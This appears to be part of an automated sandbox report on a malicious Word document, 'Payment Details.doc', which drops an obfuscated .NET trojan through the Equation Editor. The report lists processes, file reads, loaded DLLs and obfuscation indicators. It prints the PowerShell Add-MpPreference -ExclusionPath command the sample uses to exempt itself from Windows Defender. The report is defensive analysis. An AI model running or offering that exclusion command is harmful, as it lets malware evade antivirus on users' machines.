                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, Uel8r1lQF2PkteGZrv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, Uel8r1lQF2PkteGZrv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, Uel8r1lQF2PkteGZrv.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, Uel8r1lQF2PkteGZrv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@11/14@26/9
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yment Details.docJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA247.tmpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................W..........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................c..........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................u..........................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n..........................................................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s.................... .......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~...... .........................s....................$.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................. .........................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................+ .........................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................7 .........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................U .........................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................g .........................s....................l.......(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................s .........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................. .........................s............................(...............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................. .........................s............................(...............Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Payment Details.docReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeProcess created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                Source: Payment Details.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Payment Details.doc
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: HgCppsoKmxQq[1].exe.2.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: ncfplgpeter20306.exe.2.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.cs.Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.216ee4c.5.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.220000.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.21b6cb8.4.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.2165834.2.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
                Source: 5.2.ncfplgpeter20306.exe.5340000.9.raw.unpack, E0RYX9X2eibsstJT2l.cs.Net Code: zqfO5R4lW8PGwS1pTgt System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C361 pushad ; ret 2_2_0029C39D
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00298F60 push eax; retf 2_2_00298F61
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00295A7B pushad ; iretd 2_2_00295AF5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A4BBE push eax; ret 2_2_002A4BBF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002901F4 push eax; retf 2_2_002901F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0028F6C9 push ds; retf 2_2_0028F6CC
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A4BCE push eax; ret 2_2_002A4BCF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029A5DD push esp; iretd 2_2_0029A5DE
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C2DC pushad ; retn 0029h2_2_0029C2DD
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 5_2_001762A4 push esp; iretd 5_2_001762A9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C214D push ebx; iretd 9_2_001C21EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C217D push ebx; iretd 9_2_001C21EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C21AD push ebx; iretd 9_2_001C21EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001C21FD push ebx; iretd 9_2_001C21EA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_001CD410 push edi; retf 001Ch9_2_001CD411
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00719590 pushfd ; retn 006Fh9_2_00719591
                Source: HgCppsoKmxQq[1].exe.2.drStatic PE information: section name: .text entropy: 7.882388794743662
                Source: ncfplgpeter20306.exe.2.drStatic PE information: section name: .text entropy: 7.882388794743662
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, Rsjwms4Wh8At7jltVf.csHigh entropy of concatenated method names: 'saV14aRn5H', 'moE1P52r93', 'TKw1lioyLO', 'Tgp1pca6Bh', 'Cmy1we7IUo', 'Wgq1DupFs5', 'CaI1Mi57nK', 'Lbw1sLeqBx', 'idZ13c8NAv', 'O0T1mxeA09'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, hnb1mywmKd17dlbrAS.csHigh entropy of concatenated method names: 'Dispose', 'mR89ae4IBQ', 'SJdk0qMKGV', 'puBVVvKaKN', 'tps9oyNhKU', 'PRD9z8IgcF', 'ProcessDialogKey', 'E2dk8n82kY', 't9gk9jtrH3', 'mBmkkAPsqe'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, LVNaJWsMIVA7LTLASE.csHigh entropy of concatenated method names: 'zu7RHG1UCo', 'vEbR0GP5w9', 'Eo1RnLElCC', 'zSyRb4C8gr', 'L0DRqt1jRb', 'TXZRg6Ppie', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, D33N8oUtGVx7cDxPuT.csHigh entropy of concatenated method names: 'Lp7JThJpMH', 'q8ZJr8Jvgu', 'xaoJqZNHsW', 'CwFJX9qL4U', 'BgjJ0sJB97', 'HlbJnZxrmw', 'UUJJbpHxl3', 'TmgJgfpCvS', 'OX8Jiv5yws', 'f4pJfSeAAh'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, zQyvpDqyxKTxd6tm0NN.csHigh entropy of concatenated method names: 'GR7x4eMqyc', 'Kq8xPbdu6R', 'J7BxlIIphe', 'GQ7xpT3Nxd', 'LmaxwG8D2Y', 'R9hxDqi7L0', 'Ax6xMaB0Zt', 'NxYxs9KyRH', 'MlHx3p2K2W', 'VG5xmLUKfn'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, ksWtZCxKsl0TxRCTo8.csHigh entropy of concatenated method names: 'GMr1LFkylo', 'hBS1ywuum5', 'ro41O5nLLW', 'VWvOoTrbwJ', 'x5aOzGVTLw', 'IAf18nrD6A', 'n5n19G5FS1', 'fBl1kLDsu7', 'j8A1QDxhFt', 'QhN1d7YRXe'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, pLwTg0qqY9GrvEoZXIs.csHigh entropy of concatenated method names: 'ToString', 'a145Q4j8pu', 'KEt5dvERQh', 'DdN5I8eM0e', 'f0E5LRPIbe', 'wT056EPSsu', 'gSU5yxunrt', 'Gsw5EYZYIa', 'f7knYFscmhRWVWPDeQu', 'mTw6y3s22lokcZlLY0g'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, E0RYX9X2eibsstJT2l.csHigh entropy of concatenated method names: 'MToQIXKWBI', 'I3SQLs48n8', 'uf5Q6q4VEy', 'KWqQy0BBF1', 'UBEQEkuB7E', 'mIqQOFIKAA', 'wXWQ1wxG4a', 'sO5QKUDr8X', 'UTHQ7jmngF', 'T7eQFOJ0LT'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, lDlgAUP9SyyXYURNLR.csHigh entropy of concatenated method names: 'EJi4pnojSnyAHRWqhYg', 'ErevP5orqMYelnaL321', 'kFEORtVAdX', 'Ku5Ox8stk6', 'OVRO5Ji6lb', 'CxNx8bo8umiUIrPhE6k', 'lIrvcSoddavqGvXHa7M'
                Source: 5.2.ncfplgpeter20306.exe.33e7450.7.raw.unpack, sC7nprRRvT8OJFZjOZ.csHigh entropy of concatenated method names: 'rIk91RDsii', 'EuM9KyEpgg', 'KVG9F5wdH3', 'bJN9UWuJYc', 'ATy9J00PbH', 'l2k9e5iRIA', 'vgjpq3mDGeNj5ln0ix', 'wBXtHAIWQFkdYio0Cv', 'BC899EETi8', 'CUS9QYaSid'
